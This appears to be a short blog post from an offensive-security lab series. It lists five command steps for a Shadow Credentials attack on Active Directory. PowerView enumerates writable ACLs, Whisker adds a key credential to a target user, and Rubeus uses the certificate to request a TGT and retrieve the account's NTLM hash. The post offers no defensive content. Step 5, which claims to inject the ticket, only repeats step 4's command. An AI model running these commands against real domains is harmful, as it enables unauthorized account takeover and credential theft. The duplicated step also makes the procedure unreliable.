AD Shadow Credentials

Ad Attacks August 26, 2024

1 Min Read

Abusing User Object

1. Enumerate the permissions

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

2. Add the Shadow Credential

Whisker.exe add /target:supportXuser

3. Using PowerView, see if the Shadow Credential is added.

Get-DomainUser -Identity supportXuser

4. Request the TGT by leveraging the certificate

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap

5. Inject the TGT in the current session or use the NTLM hash

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap

Cross Domain Attacks

Show Comments

AD Shadow Credentials

1. Enumerate the permissions

2. Add the Shadow Credential

3. Using PowerView, see if the Shadow Credential is added.

4. Request the TGT by leveraging the certificate

5. Inject the TGT in the current session or use the NTLM hash

Leave a Reply Cancel reply

Other stories

Basic Domain Enumeration using PowerView

Cross Domain Attacks with Azure AD Integration

Basic Domain GPO Enumeration using PowerView

How to abuse Unconstrained Delegation

Press ESC to close

AD Shadow Credentials

1. Enumerate the permissions

2. Add the Shadow Credential

3. Using PowerView, see if the Shadow Credential is added.

4. Request the TGT by leveraging the certificate

5. Inject the TGT in the current session or use the NTLM hash

Leave a Reply Cancel reply

You might also like

Cross Domain Attacks with Azure AD Integration

Other stories

Basic Domain Enumeration using PowerView

Cross Domain Attacks with Azure AD Integration